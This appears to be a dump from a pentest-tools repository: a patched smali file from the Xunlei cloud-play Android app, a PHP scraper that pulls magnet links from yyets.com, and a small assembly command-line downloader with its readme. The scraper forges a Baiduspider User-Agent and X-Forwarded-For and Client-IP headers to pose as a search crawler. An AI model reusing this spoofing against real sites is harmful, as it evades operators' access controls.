987 | invoke-direct {v4}, Ljava/util/ArrayList;->()V
988 |
989 | .line 79
990 | const-string v0, ".*?"
991 |
992 | const/4 v10, 0x0
993 | const/16 v11, 0x3c
994 | const/16 v12, 0x3d
995 |
996 | const/4 v1, 0x2
997 |
998 | invoke-static {v0, v1}, Ljava/util/regex/Pattern;->compile(Ljava/lang/String;I)Ljava/util/regex/Pattern;
999 |
1000 | move-result-object v0
1001 |
1002 |
1003 |
1004 | .line 80
1005 | invoke-virtual {v0, p0}, Ljava/util/regex/Pattern;->matcher(Ljava/lang/CharSequence;)Ljava/util/regex/Matcher;
1006 |
1007 | move-result-object v5
1008 |
1009 | .line 81
1010 | :cond_0
1011 | :goto_0
1012 | invoke-virtual {v5}, Ljava/util/regex/Matcher;->find()Z
1013 |
1014 | move-result v0
1015 |
1016 | if-nez v0, :cond_1
1017 |
1018 | .line 112
1019 | return-object v4
1020 |
1021 | .line 86
1022 | :cond_1
1023 | invoke-virtual {v5}, Ljava/util/regex/Matcher;->group()Ljava/lang/String;
1024 |
1025 | move-result-object v0
1026 |
1027 | .line 88
1028 | invoke-virtual {v0}, Ljava/lang/String;->length()I
1029 |
1030 | move-result v1
1031 |
1032 | add-int/lit8 v1, v1, -0x1
1033 |
1034 | invoke-virtual {v0, v1}, Ljava/lang/String;->charAt(I)C
1035 |
1036 | move-result v1
1037 |
1038 | .line 89
1039 | const/16 v6, 0x26
1040 |
1041 | if-ne v1, v6, :cond_4
1042 |
1043 | .line 90
1044 | invoke-virtual {v0}, Ljava/lang/String;->length()I
1045 |
1046 | move-result v1
1047 |
1048 |
1049 |
1050 | invoke-virtual {v0, v10, v11}, Ljava/lang/String;->substring(II)Ljava/lang/String;
1051 |
1052 | move-result-object v8
1053 | move-object v1, v8
1054 |
1055 | .line 92
1056 | :goto_1
1057 | move-object v9, v0
1058 | const/16 v0, 0x14
1059 |
1060 | invoke-virtual {v1}, Ljava/lang/String;->length()I
1061 |
1062 | move-result v6
1063 |
1064 | invoke-virtual {v1, v0, v11}, Ljava/lang/String;->substring(II)Ljava/lang/String;
1065 |
1066 | move-result-object v0
1067 |
1068 | invoke-static {v0, v2}, Lcom/xunlei/cloud/action/search/g;->a(Ljava/lang/String;I)Ljava/lang/String;
1069 |
1070 | move-result-object v6
1071 |
1072 |
1073 |
1074 | .line 96
1075 | invoke-virtual {v4}, Ljava/util/ArrayList;->iterator()Ljava/util/Iterator;
1076 |
1077 | move-result-object v7
1078 |
1079 | :cond_2
1080 | invoke-interface {v7}, Ljava/util/Iterator;->hasNext()Z
1081 |
1082 | move-result v0
1083 |
1084 | if-nez v0, :cond_3
1085 |
1086 | move v0, v3
1087 |
1088 | .line 103
1089 | :goto_2
1090 | if-nez v0, :cond_0
1091 |
1092 | .line 104
1093 | new-instance v0, Lcom/xunlei/cloud/action/search/SnifferData;
1094 |
1095 | invoke-direct {v0}, Lcom/xunlei/cloud/action/search/SnifferData;->()V
1096 |
1097 | invoke-virtual {v9}, Ljava/lang/String;->length()I
1098 | move-result v13
1099 | add-int/lit8 v13, v13, -0x5
1100 |
1101 | invoke-virtual {v9, v12, v13}, Ljava/lang/String;->substring(II)Ljava/lang/String;
1102 | move-result-object v14
1103 |
1104 |
1105 | .line 105
1106 | iput-object v6, v0, Lcom/xunlei/cloud/action/search/SnifferData;->title:Ljava/lang/String;
1107 |
1108 | .line 106
1109 | iput-object v1, v0, Lcom/xunlei/cloud/action/search/SnifferData;->url:Ljava/lang/String;
1110 |
1111 | .line 107
1112 | iput-object v6, v0, Lcom/xunlei/cloud/action/search/SnifferData;->hash:Ljava/lang/String;
1113 |
1114 | .line 108
1115 | invoke-virtual {v4, v0}, Ljava/util/ArrayList;->add(Ljava/lang/Object;)Z
1116 |
1117 | goto :goto_0
1118 |
1119 | .line 96
1120 | :cond_3
1121 | invoke-interface {v7}, Ljava/util/Iterator;->next()Ljava/lang/Object;
1122 |
1123 | move-result-object v0
1124 |
1125 | check-cast v0, Lcom/xunlei/cloud/action/search/SnifferData;
1126 |
1127 | .line 97
1128 | iget-object v0, v0, Lcom/xunlei/cloud/action/search/SnifferData;->hash:Ljava/lang/String;
1129 |
1130 | invoke-virtual {v0, v6}, Ljava/lang/String;->equalsIgnoreCase(Ljava/lang/String;)Z
1131 |
1132 | move-result v0
1133 |
1134 | if-eqz v0, :cond_2
1135 |
1136 | move v0, v2
1137 |
1138 | .line 99
1139 | goto :goto_2
1140 |
1141 | :cond_4
1142 | move-object v1, v0
1143 |
1144 | goto :goto_1
1145 | .end method
1146 |
1147 | .method public static a(Ljava/lang/String;Lcom/xunlei/cloud/action/search/Sniffer;)Ljava/util/ArrayList;
1148 | .locals 3
1149 | .parameter
1150 | .parameter
1151 | .annotation system Ldalvik/annotation/Signature;
1152 | value = {
1153 | "(",
1154 | "Ljava/lang/String;",
1155 | "Lcom/xunlei/cloud/action/search/Sniffer;",
1156 | ")",
1157 | "Ljava/util/ArrayList",
1158 | "<",
1159 | "Lcom/xunlei/cloud/action/search/SnifferData;",
1160 | ">;"
1161 | }
1162 | .end annotation
1163 |
1164 | .prologue
1165 | const/4 v0, 0x0
1166 |
1167 | .line 47
1168 | .line 49
1169 | :try_start_0
1170 | iget v1, p1, Lcom/xunlei/cloud/action/search/Sniffer;->sniffer_id:I
1171 |
1172 | packed-switch v1, :pswitch_data_0
1173 |
1174 | .line 63
1175 | new-instance v1, Ljava/lang/StringBuilder;
1176 |
1177 | const-string v2, "\u51fa\u9519\uff0c\u672c\u7248\u672c\u6ca1\u6709\u55c5\u63a2\u5668("
1178 |
1179 | invoke-direct {v1, v2}, Ljava/lang/StringBuilder;->(Ljava/lang/String;)V
1180 |
1181 | iget v2, p1, Lcom/xunlei/cloud/action/search/Sniffer;->sniffer_id:I
1182 |
1183 | invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(I)Ljava/lang/StringBuilder;
1184 |
1185 | move-result-object v1
1186 |
1187 | const-string v2, ")"
1188 |
1189 | invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
1190 |
1191 | move-result-object v1
1192 |
1193 | invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
1194 |
1195 | move-result-object v1
1196 |
1197 | invoke-static {v1}, Lcom/xunlei/cloud/action/search/g;->e(Ljava/lang/String;)V
1198 |
1199 | .line 72
1200 | :goto_0
1201 | return-object v0
1202 |
1203 | .line 51
1204 | :pswitch_0
1205 | invoke-static {p1, p0}, Lcom/xunlei/cloud/action/search/g;->a(Lcom/xunlei/cloud/action/search/Sniffer;Ljava/lang/String;)Ljava/util/ArrayList;
1206 |
1207 | move-result-object v0
1208 |
1209 | goto :goto_0
1210 |
1211 | .line 55
1212 | :pswitch_1
1213 | invoke-static {p0}, Lcom/xunlei/cloud/action/search/g;->a(Ljava/lang/String;)Ljava/util/ArrayList;
1214 |
1215 | move-result-object v0
1216 |
1217 | goto :goto_0
1218 |
1219 | .line 59
1220 | :pswitch_2
1221 | invoke-static {p0}, Lcom/xunlei/cloud/action/search/g;->b(Ljava/lang/String;)Ljava/util/ArrayList;
1222 | :try_end_0
1223 | .catch Ljava/lang/Exception; {:try_start_0 .. :try_end_0} :catch_0
1224 |
1225 | move-result-object v0
1226 |
1227 | goto :goto_0
1228 |
1229 | .line 67
1230 | :catch_0
1231 | move-exception v1
1232 |
1233 | .line 68
1234 | invoke-virtual {v1}, Ljava/lang/Exception;->printStackTrace()V
1235 |
1236 | goto :goto_0
1237 |
1238 | .line 49
1239 | nop
1240 |
1241 | :pswitch_data_0
1242 | .packed-switch 0x0
1243 | :pswitch_0
1244 | :pswitch_1
1245 | :pswitch_2
1246 | .end packed-switch
1247 | .end method
1248 |
1249 | .method public static a(I)Z
1250 | .locals 2
1251 | .parameter
1252 |
1253 | .prologue
1254 | .line 31
1255 | new-instance v0, Ljava/util/ArrayList;
1256 |
1257 | invoke-direct {v0}, Ljava/util/ArrayList;->()V
1258 |
1259 | .line 37
1260 | const/4 v1, 0x0
1261 |
1262 | invoke-static {v1}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
1263 |
1264 | move-result-object v1
1265 |
1266 | invoke-virtual {v0, v1}, Ljava/util/ArrayList;->add(Ljava/lang/Object;)Z
1267 |
1268 | .line 38
1269 | const/4 v1, 0x1
1270 |
1271 | invoke-static {v1}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
1272 |
1273 | move-result-object v1
1274 |
1275 | invoke-virtual {v0, v1}, Ljava/util/ArrayList;->add(Ljava/lang/Object;)Z
1276 |
1277 | .line 39
1278 | const/4 v1, 0x2
1279 |
1280 | invoke-static {v1}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
1281 |
1282 | move-result-object v1
1283 |
1284 | invoke-virtual {v0, v1}, Ljava/util/ArrayList;->add(Ljava/lang/Object;)Z
1285 |
1286 | .line 41
1287 | invoke-static {p0}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
1288 |
1289 | move-result-object v1
1290 |
1291 | invoke-virtual {v0, v1}, Ljava/util/ArrayList;->contains(Ljava/lang/Object;)Z
1292 |
1293 | move-result v0
1294 |
1295 | return v0
1296 | .end method
1297 |
1298 | .method public static b(Ljava/lang/String;)Ljava/util/ArrayList;
1299 | .locals 6
1300 | .parameter
1301 | .annotation system Ldalvik/annotation/Signature;
1302 | value = {
1303 | "(",
1304 | "Ljava/lang/String;",
1305 | ")",
1306 | "Ljava/util/ArrayList",
1307 | "<",
1308 | "Lcom/xunlei/cloud/action/search/SnifferData;",
1309 | ">;"
1310 | }
1311 | .end annotation
1312 |
1313 | .prologue
1314 | .line 117
1315 | new-instance v1, Ljava/util/ArrayList;
1316 |
1317 | invoke-direct {v1}, Ljava/util/ArrayList;->()V
1318 |
1319 | .line 119
1320 | invoke-static {p0}, Landroid/text/TextUtils;->isEmpty(Ljava/lang/CharSequence;)Z
1321 |
1322 | move-result v0
1323 |
1324 | if-eqz v0, :cond_0
1325 |
1326 | move-object v0, v1
1327 |
1328 | .line 151
1329 | :goto_0
1330 | return-object v0
1331 |
1332 | .line 123
1333 | :cond_0
1334 | invoke-static {p0}, Lcom/xunlei/cloud/action/search/ZYSSResp;->newInstance(Ljava/lang/String;)Lcom/xunlei/cloud/action/search/ZYSSResp;
1335 |
1336 | move-result-object v2
1337 |
1338 | .line 125
1339 | iget-object v0, v2, Lcom/xunlei/cloud/action/search/ZYSSResp;->data:Lcom/xunlei/cloud/action/search/ZIYSSMovieData;
1340 |
1341 | iget-object v0, v0, Lcom/xunlei/cloud/action/search/ZIYSSMovieData;->bt:Ljava/util/ArrayList;
1342 |
1343 | invoke-virtual {v0}, Ljava/util/ArrayList;->iterator()Ljava/util/Iterator;
1344 |
1345 | move-result-object v3
1346 |
1347 | :goto_1
1348 | invoke-interface {v3}, Ljava/util/Iterator;->hasNext()Z
1349 |
1350 | move-result v0
1351 |
1352 | if-nez v0, :cond_2
1353 |
1354 | .line 134
1355 | iget-object v0, v2, Lcom/xunlei/cloud/action/search/ZYSSResp;->data:Lcom/xunlei/cloud/action/search/ZIYSSMovieData;
1356 |
1357 | iget-object v0, v0, Lcom/xunlei/cloud/action/search/ZIYSSMovieData;->nodes:Ljava/util/ArrayList;
1358 |
1359 | invoke-virtual {v0}, Ljava/util/ArrayList;->iterator()Ljava/util/Iterator;
1360 |
1361 | move-result-object v2
1362 |
1363 | :cond_1
1364 | :goto_2
1365 | invoke-interface {v2}, Ljava/util/Iterator;->hasNext()Z
1366 |
1367 | move-result v0
1368 |
1369 | if-nez v0, :cond_3
1370 |
1371 | move-object v0, v1
1372 |
1373 | .line 151
1374 | goto :goto_0
1375 |
1376 | .line 125
1377 | :cond_2
1378 | invoke-interface {v3}, Ljava/util/Iterator;->next()Ljava/lang/Object;
1379 |
1380 | move-result-object v0
1381 |
1382 | check-cast v0, Lcom/xunlei/cloud/action/search/ZIYSSMovie;
1383 |
1384 | .line 126
1385 | new-instance v4, Lcom/xunlei/cloud/action/search/SnifferData;
1386 |
1387 | invoke-direct {v4}, Lcom/xunlei/cloud/action/search/SnifferData;->()V
1388 |
1389 | .line 127
1390 | iget-object v5, v0, Lcom/xunlei/cloud/action/search/ZIYSSMovie;->title:Ljava/lang/String;
1391 |
1392 | iput-object v5, v4, Lcom/xunlei/cloud/action/search/SnifferData;->title:Ljava/lang/String;
1393 |
1394 | .line 128
1395 | iget-object v5, v0, Lcom/xunlei/cloud/action/search/ZIYSSMovie;->url:Ljava/lang/String;
1396 |
1397 | iput-object v5, v4, Lcom/xunlei/cloud/action/search/SnifferData;->url:Ljava/lang/String;
1398 |
1399 | .line 129
1400 | iget-object v5, v0, Lcom/xunlei/cloud/action/search/ZIYSSMovie;->size:Ljava/lang/String;
1401 |
1402 | iput-object v5, v4, Lcom/xunlei/cloud/action/search/SnifferData;->size:Ljava/lang/String;
1403 |
1404 | .line 130
1405 | iget-object v0, v0, Lcom/xunlei/cloud/action/search/ZIYSSMovie;->url:Ljava/lang/String;
1406 |
1407 | invoke-static {v0}, Lcom/xunlei/cloud/action/search/g;->c(Ljava/lang/String;)Ljava/lang/String;
1408 |
1409 | move-result-object v0
1410 |
1411 | iput-object v0, v4, Lcom/xunlei/cloud/action/search/SnifferData;->hash:Ljava/lang/String;
1412 |
1413 | .line 131
1414 | invoke-virtual {v1, v4}, Ljava/util/ArrayList;->add(Ljava/lang/Object;)Z
1415 |
1416 | goto :goto_1
1417 |
1418 | .line 134
1419 | :cond_3
1420 | invoke-interface {v2}, Ljava/util/Iterator;->next()Ljava/lang/Object;
1421 |
1422 | move-result-object v0
1423 |
1424 | check-cast v0, Lcom/xunlei/cloud/action/search/ZIYSSMovie;
1425 |
1426 | .line 136
1427 | iget v3, v0, Lcom/xunlei/cloud/action/search/ZIYSSMovie;->type:I
1428 |
1429 | const/16 v4, 0xf
1430 |
1431 | if-eq v3, v4, :cond_1
1432 |
1433 | .line 137
1434 | new-instance v3, Lcom/xunlei/cloud/action/search/SnifferData;
1435 |
1436 | invoke-direct {v3}, Lcom/xunlei/cloud/action/search/SnifferData;->()V
1437 |
1438 | .line 138
1439 | iget-object v4, v0, Lcom/xunlei/cloud/action/search/ZIYSSMovie;->title:Ljava/lang/String;
1440 |
1441 | invoke-static {v4}, Landroid/net/Uri;->decode(Ljava/lang/String;)Ljava/lang/String;
1442 |
1443 | move-result-object v4
1444 |
1445 | iput-object v4, v3, Lcom/xunlei/cloud/action/search/SnifferData;->title:Ljava/lang/String;
1446 |
1447 | .line 139
1448 | iget-object v4, v0, Lcom/xunlei/cloud/action/search/ZIYSSMovie;->url:Ljava/lang/String;
1449 |
1450 | iput-object v4, v3, Lcom/xunlei/cloud/action/search/SnifferData;->url:Ljava/lang/String;
1451 |
1452 | .line 140
1453 | iget-object v4, v0, Lcom/xunlei/cloud/action/search/ZIYSSMovie;->size:Ljava/lang/String;
1454 |
1455 | iput-object v4, v3, Lcom/xunlei/cloud/action/search/SnifferData;->size:Ljava/lang/String;
1456 |
1457 | .line 141
1458 | iget v4, v0, Lcom/xunlei/cloud/action/search/ZIYSSMovie;->type:I
1459 |
1460 | const/16 v5, 0xd
1461 |
1462 | if-ne v4, v5, :cond_4
1463 |
1464 | .line 142
1465 | iget-object v0, v0, Lcom/xunlei/cloud/action/search/ZIYSSMovie;->url:Ljava/lang/String;
1466 |
1467 | invoke-static {v0}, Lcom/xunlei/cloud/action/search/g;->c(Ljava/lang/String;)Ljava/lang/String;
1468 |
1469 | move-result-object v0
1470 |
1471 | iput-object v0, v3, Lcom/xunlei/cloud/action/search/SnifferData;->hash:Ljava/lang/String;
1472 |
1473 | .line 144
1474 | :cond_4
1475 | iget-object v0, v3, Lcom/xunlei/cloud/action/search/SnifferData;->title:Ljava/lang/String;
1476 |
1477 | if-eqz v0, :cond_5
1478 |
1479 | .line 145
1480 | iget-object v0, v3, Lcom/xunlei/cloud/action/search/SnifferData;->title:Ljava/lang/String;
1481 |
1482 | const-string v4, "(\\r|\\n)"
1483 |
1484 | const-string v5, ""
1485 |
1486 | invoke-virtual {v0, v4, v5}, Ljava/lang/String;->replaceAll(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
1487 |
1488 | move-result-object v0
1489 |
1490 | iput-object v0, v3, Lcom/xunlei/cloud/action/search/SnifferData;->title:Ljava/lang/String;
1491 |
1492 | .line 147
1493 | :cond_5
1494 | invoke-virtual {v1, v3}, Ljava/util/ArrayList;->add(Ljava/lang/Object;)Z
1495 |
1496 | goto :goto_2
1497 | .end method
1498 |
1499 | .method public static c(Ljava/lang/String;)Ljava/lang/String;
1500 | .locals 7
1501 | .parameter
1502 |
1503 | .prologue
1504 | const/4 v3, 0x0
1505 |
1506 | .line 155
1507 | const/4 v1, 0x1
1508 |
1509 | const-string v2, "magnet:?xt=urn:btih:"
1510 |
1511 | const-string v5, "&"
1512 |
1513 | move-object v0, p0
1514 |
1515 | move v4, v3
1516 |
1517 | move v6, v3
1518 |
1519 | invoke-static/range {v0 .. v6}, Lcom/xunlei/cloud/action/search/g;->a(Ljava/lang/String;ZLjava/lang/String;ZZLjava/lang/String;Z)Ljava/lang/String;
1520 |
1521 | move-result-object v0
1522 |
1523 | .line 156
1524 | return-object v0
1525 | .end method
1526 |
1527 | .method public static d(Ljava/lang/String;)Ljava/lang/String;
1528 | .locals 2
1529 | .parameter
1530 |
1531 | .prologue
1532 | .line 390
1533 | :try_start_0
1534 | const-string v0, "UTF-8"
1535 |
1536 | invoke-static {p0, v0}, Ljava/net/URLDecoder;->decode(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
1537 | :try_end_0
1538 | .catch Ljava/lang/Exception; {:try_start_0 .. :try_end_0} :catch_0
1539 |
1540 | move-result-object v0
1541 |
1542 | .line 396
1543 | :goto_0
1544 | return-object v0
1545 |
1546 | .line 392
1547 | :catch_0
1548 | move-exception v0
1549 |
1550 | .line 393
1551 | invoke-virtual {v0}, Ljava/lang/Exception;->printStackTrace()V
1552 |
1553 | .line 395
1554 | const-string v0, "%"
1555 |
1556 | const-string v1, ""
1557 |
1558 | invoke-virtual {p0, v0, v1}, Ljava/lang/String;->replace(Ljava/lang/CharSequence;Ljava/lang/CharSequence;)Ljava/lang/String;
1559 |
1560 | move-result-object v0
1561 |
1562 | goto :goto_0
1563 | .end method
1564 |
1565 | .method private static e(Ljava/lang/String;)V
1566 | .locals 1
1567 | .parameter
1568 |
1569 | .prologue
1570 | .line 384
1571 | sget-object v0, Lcom/xunlei/cloud/action/search/g;->a:Lcom/xunlei/cloud/util/af;
1572 |
1573 | invoke-virtual {v0, p0}, Lcom/xunlei/cloud/util/af;->a(Ljava/lang/Object;)V
1574 |
1575 | .line 385
1576 | return-void
1577 | .end method
1578 |
--------------------------------------------------------------------------------
/project/diy_cloudplay/readme.md:
--------------------------------------------------------------------------------
1 | Diy cloudplay for Android
2 | ===================================
3 | Date: 2014-4-5
4 | File: y2c.php yyets.com 中转文件
5 | File: g.smali 修复标题bug
6 | Link: http://yaseng.me/diy-cloudplay-for-android.html
7 |
--------------------------------------------------------------------------------
/project/diy_cloudplay/y2c.php:
--------------------------------------------------------------------------------
1 | (.*?)(.*?)电驴
22 | //(.*?)(.*?)urn:btih:(.*?)&
23 | //(.*?)<\/span>(.*?)urn:btih:([A-Za-z\d]{32,})&/
24 | $tvs=get($list[1]);
25 |
26 |
27 |
28 | $arr_tv=array();
29 | if(preg_match_all('/(.*?)<\/span>(.*?)type="magnet/', $tvs, $matches)){
30 |
31 |
32 | $arr_tv_name=($matches[2]);
33 | $arr_tv_magnet=($matches[3]);
34 | $n_tv=count($arr_tv_name);
35 |
36 |
37 |
38 | for($i=0;$i< $n_tv ; $i++){
39 |
40 |
41 | if(preg_match("/urn:btih:([A-Za-z\d]{32,})/", $arr_tv_magnet[$i], $magnet)){
42 |
43 | echo "magnet:?xt=urn:btih:".$magnet[1]."&".$arr_tv_name[$i]."";
44 |
45 | }
46 |
47 |
48 | }
49 |
50 |
51 |
52 | }else{
53 |
54 | exit("Nothing");
55 |
56 |
57 | }
58 |
59 |
60 |
61 |
62 | }
63 |
64 | function get($url){
65 |
66 | $ip="115.239.210.27";
67 | $agetnt="Baiduspider+(+http://www.baidu.com/search/spider.htm)";
68 | $referer="www.baidu.com";
69 | $option = array(
70 | 'http' => array(
71 | 'timeout'=>60,
72 | 'header'=>"refererer:{$referer}"."\r\n"."User-Agent:{$agetnt}"."\r\n"."X-FORWARDED-FOR:{$ip}"."\r\n"."CLIENT-IP:{$ip}",)
73 | );
74 | return file_get_contents($url, false,stream_context_create($option));
75 |
76 |
77 | }
78 |
79 |
80 | ?>
81 |
--------------------------------------------------------------------------------
/project/wgetex/WgetEx.Asm:
--------------------------------------------------------------------------------
1 | .386
2 | .MODEL flat, stdcall
3 | OPTION CASEMAP:NONE
4 | Include windows.inc
5 | include kernel32.inc
6 | include user32.inc
7 | Include masm32.inc
8 | Include shell32.inc
9 | Include Comctl32.inc
10 | Include oleaut32.inc
11 | Include macros.asm
12 | includelib kernel32.lib
13 | includelib user32.lib
14 | IncludeLib masm32.lib
15 | IncludeLib shell32.lib
16 | include masm32rt.inc
17 | include urlmon.inc
18 | includelib urlmon.lib
19 |
20 |
21 |
22 |
23 |
24 | .data
25 |
26 | HelloMsg DB "[*] WgetEx 1.0 By Yaseng ", 0
27 | szDownInfo DB '[+] start ownload url:%s file:%s',00Ah, 00Dh,0
28 |
29 | .code
30 | Start:
31 | call main
32 | invoke ExitProcess, 0
33 |
34 |
35 |
36 | main proc
37 |
38 | LOCAL szUrl[260]:BYTE
39 | LOCAL szFileName[260]:BYTE
40 | LOCAL buffer[260]:BYTE
41 | print SADD("[*] WgetEx 1.0 By Yaseng ",13,10)
42 | sub eax,eax
43 | invoke GetCL,1,ADDR szUrl
44 | .if eax != 1
45 | print SADD("[-] url parameter is missing",13,10)
46 | call help
47 | ret
48 | .endif
49 | invoke GetCL,2,ADDR szFileName
50 | .if eax != 1
51 | print SADD("[-] file parameter is missing",13,10)
52 | call help
53 | ret
54 | .endif
55 |
56 |
57 | invoke wsprintf,addr buffer,addr szDownInfo,addr szUrl,addr szFileName
58 | invoke StdOut,addr buffer
59 | invoke URLDownloadToFile,0,addr szUrl,addr szFileName,0,0
60 | invoke exist,ADDR szFileName
61 | .if eax != 1
62 | print SADD("[-] download av failed !!! ",13,10)
63 | .else
64 | print SADD("[+] download av succeed !!! ",13,10)
65 | .endif
66 | ret
67 | main endp
68 |
69 |
70 | help proc
71 |
72 | print SADD("[*] WgetEx :Thunderbolt Download program",13,10)
73 | print SADD("[*] Usage :WgetEx http://yaseng.me/av.rmvb av.rmvb",13,10)
74 |
75 | ret
76 |
77 | help endp
78 |
79 |
80 |
81 | End Start
--------------------------------------------------------------------------------
/project/wgetex/WgetEx.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yaseng/pentest/e98a4c310439adbd4e8bbb4ec5abf4bb00608676/project/wgetex/WgetEx.exe
--------------------------------------------------------------------------------
/project/wgetex/macros.asm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yaseng/pentest/e98a4c310439adbd4e8bbb4ec5abf4bb00608676/project/wgetex/macros.asm
--------------------------------------------------------------------------------
/project/wgetex/readme.txt:
--------------------------------------------------------------------------------
1 | /**
2 | * @Name wgetex
3 | * @desc A convenient command-line download program
4 | * @author Yaseng WwW.Yaseng.Me [Yaseng@UAUC.NET]
5 | */
6 |
7 | C:\>wgetex
8 | [*] WgetEx 1.0 By Yaseng
9 | [-] url parameter is missing
10 | [*] WgetEx :Thunderbolt Download program
11 | [*] Usage :WgetEx http://yaseng.me/av.rmvb av.rmvb
12 |
13 | C:\>wgetex http://www.baidu.com/img/bdlogo.gif
14 | [*] WgetEx 1.0 By Yaseng
15 | [-] file parameter is missing
16 | [*] WgetEx :Thunderbolt Download program
17 | [*] Usage :WgetEx http://yaseng.me/av.rmvb av.rmvb
18 |
19 | C:\>wgetex http://www.baidu.com/img/bdlogo.gif dblogo.gif
20 | [*] WgetEx 1.0 By Yaseng
21 | [+] start ownload url:http://www.baidu.com/img/bdlogo.gif file:dblogo.gif
22 | [+] download av succeed !
--------------------------------------------------------------------------------